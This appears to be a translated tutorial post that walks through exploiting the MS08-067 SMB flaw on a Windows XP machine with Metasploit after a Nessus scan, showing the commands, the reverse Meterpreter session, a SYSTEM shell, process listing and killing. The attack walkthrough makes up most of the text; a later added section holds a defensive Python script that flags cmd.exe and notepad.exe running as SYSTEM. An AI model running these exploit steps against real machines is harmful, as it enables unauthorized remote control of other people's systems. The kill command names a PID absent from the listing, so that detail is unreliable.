Here we cover only how it works.
There are two ways to execute exploits. In the first, we scan with Nessus to see the open ports, then
select the entry whose SVC Name is smb.
After that, double-click it.
After that we open Konsole and then run msfconsole.
After that we type the following command and press Enter:
msf > use windows/smb/ms08_067_netapi
This follows on from the port scan in Nessus. After that, set the IP that I use:
msf exploit(ms08_067_netapi) > set lhost 192.168.1.141
lhost => 192.168.1.141
This sets the attacker's IP.
msf exploit(ms08_067_netapi) > set rhost 192.168.56.101
rhost => 192.168.56.101
This sets the target's IP.
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1034) at 2012-01-28 22:43:12 +0700
After that we type:
meterpreter > execute -f cmd.exe -M -i
(This is the command used to get into the target, for example Windows.)
Process 504 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>cd..
cd..
C:\WINDOWS>cd..
cd..
C:\>mkdir folder_yogi
mkdir folder_yogi
mkdir is the command for making a new folder on the Windows target, here with the name folder_yogi.
meterpreter > ps
Process list
============
PID   Name              Arch  Session  User                           Path
---   ----              ----  -------  ----                           ----
0     [System Process]
1036  svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
1076  wscntfy.exe       x86   0        L-06E01A37ECAE4\Administrator  C:\WINDOWS\system32\wscntfy.exe
1080  svchost.exe       x86   0        NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\system32\svchost.exe
1124  notepad.exe       x86   0        L-06E01A37ECAE4\Administrator  C:\WINDOWS\system32\notepad.exe
1320  notepad.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\notepad.exe
1436  spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
1544  explorer.exe      x86   0        L-06E01A37ECAE4\Administrator  C:\WINDOWS\Explorer.EXE
320   cmd.exe           x86   0        L-06E01A37ECAE4\Administrator  C:\WINDOWS\system32\cmd.exe
352   smss.exe          x86   0        NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
4     System            x86   0        NT AUTHORITY\SYSTEM
456   NOTEPAD.EXE       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\NOTEPAD.EXE
504   cmd.exe           x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\cmd.exe
568   csrss.exe         x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
572   alg.exe           x86   0        NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\System32\alg.exe
592   winlogon.exe      x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
636   services.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
640   notepad.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\notepad.exe
648   lsass.exe         x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
744   notepad.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\notepad.exe
812   svchost.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
892   svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
932   wpabaln.exe       x86   0        L-06E01A37ECAE4\Administrator  C:\WINDOWS\system32\wpabaln.exe
984   svchost.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
ps is the command for listing the programs running on our target.
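Read from the defender's side, the same listing shows what stands out on this host: cmd.exe and notepad.exe, programs a logged-on user normally starts, running as NT AUTHORITY\SYSTEM. The Python below is an added example, not part of the original post; it parses rows in the listing's format and flags those processes. The INTERACTIVE watchlist and the function names are assumptions made for this illustration.

```python
import re

# Assumption: a small watchlist of programs a logged-on user starts by hand.
INTERACTIVE = {"cmd.exe", "notepad.exe"}
SYSTEM_USER = r"nt authority\system"

# One row of the listing: PID Name Arch Session User [Path].
# The user may contain spaces; a path starts with "X:\" or "\".
ROW = re.compile(
    r"^(?P<pid>\d+)\s+(?P<name>\S+)\s+(?P<arch>x86\S*)\s+(?P<session>\d+)\s+"
    r"(?P<user>\S.*?)(?:\s+(?P<path>(?:[A-Za-z]:)?\\\S.*))?$"
)

def parse_rows(listing):
    """Return one dict per row that has the PID..User columns."""
    rows = []
    for line in listing.splitlines():
        m = ROW.match(line.strip())
        if m:  # header lines and "0 [System Process]" do not match
            rows.append(m.groupdict())
    return rows

def flag_system_interactive(rows):
    """PIDs of watchlisted programs whose owner is NT AUTHORITY\\SYSTEM."""
    return [int(r["pid"]) for r in rows
            if r["name"].lower() in INTERACTIVE
            and r["user"].lower() == SYSTEM_USER]

# Rows copied from the ps output above (not the full listing).
SAMPLE = r"""
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
1036 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1124 notepad.exe x86 0 L-06E01A37ECAE4\Administrator C:\WINDOWS\system32\notepad.exe
1320 notepad.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\notepad.exe
320 cmd.exe x86 0 L-06E01A37ECAE4\Administrator C:\WINDOWS\system32\cmd.exe
4 System x86 0 NT AUTHORITY\SYSTEM
456 NOTEPAD.EXE x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\NOTEPAD.EXE
504 cmd.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\cmd.exe
568 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
"""

if __name__ == "__main__":
    for pid in flag_system_interactive(parse_rows(SAMPLE)):
        print("review: PID", pid, "runs as SYSTEM")
```

The same check applies to any process inventory that records the owning account, such as output collected by an endpoint agent.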
meterpreter > kill 1321
Killing: 1321
Killing: 1321
kill is used to end a program that is running on our target.
Finished.